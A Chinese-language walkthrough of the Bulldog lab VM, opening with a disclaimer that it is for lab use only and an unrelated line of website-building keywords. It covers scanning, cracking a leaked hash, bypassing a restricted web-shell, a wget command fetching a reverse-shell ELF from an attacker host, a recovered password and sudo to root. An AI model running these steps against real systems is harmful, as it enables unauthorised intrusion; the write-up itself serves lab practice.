自己如何建立网站,网站开发的完整流程,小电商平台有哪些,网站开发 家具销售 文献声明
文中涉及操作均来自靶机虚拟环境#xff0c;禁止用于真实环境#xff0c;任何未经授权的渗透测试都是违法行为#xff01;
开搞
首先nmap扫描目标机开放端口和服务 访问80端口 扫目录撒 发现登录口 点击web-shell提示登录后才能使用 /dev/下面查看网页源码发现村咋h…声明
文中涉及操作均来自靶机虚拟环境禁止用于真实环境任何未经授权的渗透测试都是违法行为
开搞
首先nmap扫描目标机开放端口和服务 访问80端口 扫目录撒 发现登录口 点击web-shell提示登录后才能使用 /dev/下面查看网页源码发现村咋hash值 awk提取hash
把那堆复制到1.txt中提取
在线解密
https://crackstation.net/
nick/bulldog登录 进入web-shell
可以执行命令 但是很多命令不让用 可以用echo curl 的方法绕过限制
创建反弹shell
python起个服务 wget下载到目标
echo wget http://192.168.2.129:5555/5555.elfmsf建立监听 给5555.elf添加执行权限并执行 拿到shell 进入shell 查看家目录有啥 查看hiddenadmindirectory
查看note
密码藏在customPermissionApp
SUPERultimatePASSWORDyouCANTget
结束
因为这个文件是bulldogadmin的文件我的身份是django所以需要sudo 去给他加执行权限sudo chmod 777 customPermissionApp就要用到django的密码 执行后变成了root权限 靶标一般就在root目录下
